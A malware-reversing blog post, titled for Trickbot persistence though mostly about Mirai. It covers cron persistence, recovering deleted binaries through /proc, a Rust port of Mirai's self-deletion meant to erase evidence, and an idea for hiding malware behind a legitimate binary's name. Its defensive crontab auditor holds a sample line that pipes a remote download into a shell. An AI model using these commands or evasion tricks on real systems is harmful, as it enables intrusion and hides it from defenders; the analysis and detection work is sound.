<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<!-- 2026-04-21 Tue 15:26 -->
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Trickbot persistence.</title>
<meta name="generator" content="Org Mode" />
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes">
<meta http-equiv="Content-Security-Policy" content="style-src-elem 'self' https://wmealing.github.io;">
<link rel="stylesheet" href="index.css">
<meta name="author" content="Wade Mealing" />
</head>
<body>
<div id="content" class="content">
<h1 class="title">Trickbot persistence.</h1>
<nav class="navbar-custom">
<div class="navbar-container">
<div class="navbar-brand">
<a href="index.html">Wade Mealing</a>
</div>
<div class="navbar-grid">
<div class="navbar-section">
<a href="systems.html"><h3>Systems</h3></a>
<div class="navbar-tags">
<a href="systems-erlang.html"><span class="navbar-tag">Erlang/OTP</span></a>
<a href="systems-clojure.html"><span class="navbar-tag">Clojure</span></a>
<a href="systems-lfe.html"><span class="navbar-tag">Lisp Flavored Erlang</span></a>
<a href="systems-cellium.html"><span class="navbar-tag">Cellium (TUI Framework)</span></a>
</div>
</div>
<div class="navbar-section">
<a href="security.html"><h3>Security</h3></a>
<div class="navbar-tags">
<a href="security-kernel.html"><span class="navbar-tag">Linux Kernel Analysis</span></a>
<a href="security-ebpf.html"><span class="navbar-tag">eBPF</span></a>
<a href="security-malware.html"><span class="navbar-tag">Malware Reversing</span></a>
<a href="security-rust.html"><span class="navbar-tag">Rust</span></a>
</div>
</div>
<div class="navbar-section">
<a href="tooling.html"><h3>Tooling</h3></a>
<div class="navbar-tags">
<a href="tooling-emacs.html"><span class="navbar-tag">Emacs / Elisp</span></a>
<a href="tooling-cicd.html"><span class="navbar-tag">CI/CD Pipelines</span></a>
<a href="tooling-openscad.html"><span class="navbar-tag">OpenSCAD</span></a>
</div>
</div>
</div>
<div class="navbar-utility">
<a href="rss.xml" class="rss-link">RSS</a>
<div class="navbar-avatar">
<a href="index.html"><img src="apple-touch-icon.png" alt="Avatar"></a>
</div>
</div>
</div>
</nav>
<div id="outline-container-org63ec604" class="outline-2">
<h2 id="org63ec604">What is persistence ?</h2>
<div class="outline-text-2" id="text-org63ec604">
<p>
A system may be rebooted at regular intervals as part of its
lifecycle, when a new kernel is installed, or if it enters an unknown
state.
</p>
<p>
The author of the Trickbot malware elected to use the cron task
scheduling service to ensure it keeps executing across those reboots.
</p>
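<p>
As an added example, not Trickbot's own code and not a claim about how
its cron entry looks: a small Rust audit that parses crontab text and
flags the traits a dropped-in persistence job tends to show (a command
under /tmp, /var/tmp or /dev/shm, a hidden path component, piping a
download into a shell). The crontab text is constructed for the
example, and the list of suspect directories is an assumption.
</p>

```rust
// Audit crontab text for entries that look like a dropped-in persistence
// hook. Added example: not Trickbot code and not a claim about how its
// cron entry looks. The sample crontab below is constructed.
use std::path::Path;

/// Directories a legitimate scheduled job rarely runs from but dropped
/// malware often does; an assumed list for the example.
const SUSPECT_DIRS: [&str; 4] = ["/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/"];

/// Constructed sample (user-crontab format), not a real capture.
pub const SAMPLE_CRONTAB: &str = "\
# constructed sample, not a real capture
SHELL=/bin/sh
PATH=/usr/local/bin:/usr/bin:/bin
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * /tmp/.malware/init >/dev/null 2>&1
@reboot curl -s http://198.51.100.7/x | sh
";

#[derive(Debug, PartialEq)]
pub struct CronJob {
    pub schedule: String,
    pub command: String,
}

/// Parse user-crontab text: five time fields or an @shortcut, then the
/// command. Comments, blank lines and VAR=value lines are skipped.
/// /etc/crontab and /etc/cron.d files carry an extra user field after the
/// schedule, which this parser does not handle.
pub fn parse_crontab(text: &str) -> Vec<CronJob> {
    let mut jobs = Vec::new();
    for line in text.lines().map(str::trim) {
        if line.is_empty() || line.starts_with('#') {
            continue;
        }
        let fields: Vec<&str> = line.split_whitespace().collect();
        let is_shortcut = line.starts_with('@');
        if !is_shortcut && fields[0].contains('=') {
            continue; // environment assignment such as SHELL=/bin/sh
        }
        let n = if is_shortcut { 1 } else { 5 };
        if fields.len() <= n {
            continue; // no command after the schedule
        }
        jobs.push(CronJob {
            schedule: fields[..n].join(" "),
            command: fields[n..].join(" "),
        });
    }
    jobs
}

/// Why a job looks like a persistence hook; empty means nothing flagged.
pub fn suspicious_reasons(job: &CronJob) -> Vec<String> {
    let mut reasons = Vec::new();
    for token in job.command.split_whitespace() {
        let tok = token.trim_matches(|c: char| "\"';&".contains(c));
        if SUSPECT_DIRS.iter().any(|d| tok.starts_with(d)) {
            reasons.push(format!("runs from a world-writable scratch dir: {}", tok));
        }
        let hidden = Path::new(tok).components().any(|c| {
            c.as_os_str().to_str().map_or(false, |s| s.starts_with('.') && s != "." && s != "..")
        });
        if hidden {
            reasons.push(format!("hidden path component: {}", tok));
        }
    }
    if ["| sh", "|sh", "| bash", "|bash"].iter().any(|p| job.command.contains(*p)) {
        reasons.push("pipes fetched content into a shell".to_string());
    }
    // A boot-time trigger is common for legitimate jobs too, so it is
    // only reported alongside another finding.
    if !reasons.is_empty() && job.schedule == "@reboot" {
        reasons.push("re-runs at every boot".to_string());
    }
    reasons
}

/// Parse and return only the jobs that raised at least one reason.
pub fn audit(text: &str) -> Vec<(CronJob, Vec<String>)> {
    parse_crontab(text)
        .into_iter()
        .filter_map(|job| {
            let reasons = suspicious_reasons(&job);
            if reasons.is_empty() { None } else { Some((job, reasons)) }
        })
        .collect()
}

fn main() {
    for (job, reasons) in audit(SAMPLE_CRONTAB) {
        println!("{:<14} {}", job.schedule, job.command);
        for r in &reasons {
            println!("    - {}", r);
        }
    }
}
```

<p>
On a live host the text would come from each file under
/var/spool/cron (or /var/spool/cron/crontabs) rather than the embedded
sample; the heuristics are deliberately loose, and a hit is a prompt to
look at the command and the file it runs, not a verdict.
</p>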
</div>
</div>
<div id="outline-container-org04bd4db" class="outline-2">
<h2 id="org04bd4db">Recovering an executable file.</h2>
<div class="outline-text-2" id="text-org04bd4db">
<p>
The /proc filesystem exposes, for every running process, a link to its
executable and to every file it holds open, and those links keep
working even after the file has been removed from disk.
</p>
<p>
The executable of a process is reachable through /proc/&lt;pid&gt;/exe.
</p>
<pre class="example" id="org496b181">
$ sudo ls -l /proc/975301/exe
lrwxrwxrwx. 1 root root 0 Nov 8 22:50 /proc/975301/exe -> /tmp/.malware/init
</pre>
<p>
Opening the link opens the executable's inode, not a copy, so with root
permissions the binary can be copied out for later inspection even
after its original path has been unlinked (the link target then ends
in " (deleted)", but it still reads).
</p>
<pre class="example" id="org4fa2bef">
$ sudo cat /proc/975301/exe &gt; ~/captured-executable
</pre>
<p>
If the malware is written in a scripting language (Mirai is not),
/proc/&lt;pid&gt;/exe points at the interpreter; the script itself is
usually still held open and can be found under /proc/&lt;pid&gt;/fd/
</p>
<pre class="example" id="org28363c2">
$ sudo ls -l /proc/975301/fd/
total 0
lr-x------. 1 root root 64 Nov 10 01:08 0 -> /dev/null
lrwx------. 1 root root 64 Nov 10 01:08 1 -> 'socket:[38592]'
l-wx------. 1 root root 64 Nov 10 01:08 10 -> /tmp/.malware/script.py
</pre>
</div>
</div>
<div id="outline-container-org510f5da" class="outline-2">
<h2 id="org510f5da">The sample code.</h2>
<div class="outline-text-2" id="text-org510f5da">
<p>
Mirai's self-deletion code is simple and does no error checking.
</p>
<pre class="example" id="org8b4fc7c">
// Delete self
unlink(args[0]);
</pre>
<p>
See <a href="https://github.com/wmealing/Mirai-Source-Code/blob/master/mirai/bot/main.c#L61">it in action here</a>.
</p>
<p>
The <a href="https://linux.die.net/man/2/unlink">unlink</a> function deletes a file by name from the file system. It
has a number of possible error conditions, but it appears that the
author did not care about any of them. Note that unlink only removes
the name: the file's data stays on disk while the running process has
it mapped, which is what makes the /proc recovery above possible.
</p>
</div>
</div>
<div id="outline-container-org2dd5203" class="outline-2">
<h2 id="org2dd5203">Porting to rust.</h2>
<div class="outline-text-2" id="text-org2dd5203">
<p>
To implement the same functionality in Rust we first need the path of
the current process's executable.
</p>
<p>
Much like in C, it is the first entry of the process's argument list,
available through std::env::args(). argv[0] is only whatever the
parent passed to execve, so std::env::current_exe() is the more
reliable source; Mirai uses args[0], so the port does the same.
</p>
<p>
Once we have the program path, it is a simple matter of calling
Rust's std::fs::remove_file to unlink it.
</p>
<p>
The process keeps running normally after the file has been unlinked:
the kernel holds the inode of the mapped executable open until the
process exits.
</p>
<pre class="example" id="org117d915">
use std::fs;
use std::io;

fn main() {
    // Delete the executing file to remove incriminating evidence.
    // args().next() is argv[0]; it is normally present but is only
    // whatever the parent passed to execve.
    let argv0 = std::env::args().next().expect("argv[0] missing");
    // Like the Mirai original, the outcome is not checked.
    let _result = delete_file(&amp;argv0);
}

fn delete_file(filename: &amp;str) -&gt; io::Result&lt;()&gt; {
    eprintln!("Deleting binary!");
    fs::remove_file(filename)?;
    Ok(())
}
</pre>
<p>
Having the executable 'missing' is one of the big alarm bells for an
intrusion detection system: the /proc/&lt;pid&gt;/exe link of the running
process now reads '/tmp/.malware/init (deleted)'.
</p>
<p>
Perhaps a better option, harder to detect, would be to move a
legitimate binary aside, rename the malware into its place, run it
from there, then delete the malware and put the original executable
back.
</p>
<p>
This would be much harder to spot, especially if it communicated on
the same ports and carried the same process name. It is not invisible,
though: /proc/&lt;pid&gt;/exe follows the inode rather than the name, so
the link still gains the '(deleted)' suffix once the file is unlinked,
and the bytes read back through it will not match the copy the package
manager installed.
</p>
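<p>
Putting the /proc recovery described earlier and this 'missing
executable' signal together, here is an added example in Rust (not
Mirai's, Trickbot's, or this page's code): it walks /proc, reports every
process whose exe link carries the " (deleted)" suffix the kernel appends
once the binary is unlinked, and copies the still-mapped binary out
through the link. Linux only. The /proc root is passed in rather than
hard-coded, and the output path /tmp/recovered-&lt;pid&gt;.bin is an
assumption of the example.
</p>

```rust
// Hunt for processes whose executable was unlinked from disk and copy the
// still-mapped binary out through /proc. Added example, not Mirai/Trickbot
// code or this page's. Linux only: it depends on the /proc/<pid>/exe link.
use std::fs;
use std::io;
use std::path::{Path, PathBuf};

/// One running process and where its exe link points.
#[derive(Debug, PartialEq)]
pub struct ExeEntry {
    pub pid: u32,
    pub target: String,
    pub deleted: bool,
}

/// The kernel appends " (deleted)" to the readlink target once the file
/// behind /proc/<pid>/exe has been unlinked.
pub fn is_deleted_target(target: &str) -> bool {
    target.ends_with(" (deleted)")
}

/// The path the binary had before it was unlinked.
pub fn original_path(target: &str) -> &str {
    target.strip_suffix(" (deleted)").unwrap_or(target)
}

/// Read the exe link of one /proc/<pid> directory. Non-numeric entries
/// (self, sys, ...), kernel threads (no exe link) and processes we lack
/// permission to inspect all yield None instead of aborting the scan.
pub fn inspect(proc_dir: &Path) -> Option<ExeEntry> {
    let pid: u32 = proc_dir.file_name()?.to_str()?.parse().ok()?;
    let target = fs::read_link(proc_dir.join("exe")).ok()?;
    let target = target.to_string_lossy().into_owned();
    let deleted = is_deleted_target(&target);
    Some(ExeEntry { pid, target, deleted })
}

/// Walk a /proc root and return every process whose binary is gone.
pub fn find_deleted(proc_root: &Path) -> io::Result<Vec<ExeEntry>> {
    let mut hits = Vec::new();
    for entry in fs::read_dir(proc_root)? {
        if let Some(e) = inspect(&entry?.path()) {
            if e.deleted {
                hits.push(e);
            }
        }
    }
    Ok(hits)
}

/// Copy the executable out via /proc/<pid>/exe. Opening the link opens the
/// original inode, so this works after the path itself is gone. Returns
/// the number of bytes written.
pub fn recover(proc_root: &Path, pid: u32, dest: &Path) -> io::Result<u64> {
    let src = proc_root.join(pid.to_string()).join("exe");
    let mut input = fs::File::open(src)?;
    let mut output = fs::File::create(dest)?;
    io::copy(&mut input, &mut output)
}

fn main() -> io::Result<()> {
    let proc_root = Path::new("/proc");
    for hit in find_deleted(proc_root)? {
        // Output location is an assumption of the example; run as root so
        // other users' exe links are readable.
        let dest = PathBuf::from(format!("/tmp/recovered-{}.bin", hit.pid));
        let bytes = recover(proc_root, hit.pid, &dest)?;
        println!("pid {} ran {} (now unlinked): {} bytes saved to {}",
                 hit.pid, original_path(&hit.target), bytes, dest.display());
    }
    Ok(())
}
```

<p>
Run it as root, since reading another user's /proc/&lt;pid&gt;/exe needs
ptrace-level access. Hashing the recovered file and comparing it with
the package-owned copy of the path it claims is the natural next step;
the same scan also catches the rename-into-place trick above once the
file is unlinked.
</p>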
</div>
</div>
<div id="outline-container-org9fa0c19" class="outline-2">
<h2 id="org9fa0c19">Resources:</h2>
<div class="outline-text-2" id="text-org9fa0c19">
<ul class="org-ul">
<li><a href="https://github.com/wmealing/Mirai-Source-Code">Mirai source code</a></li>
</ul>
</div>
</div>
</div>
</body>
</html>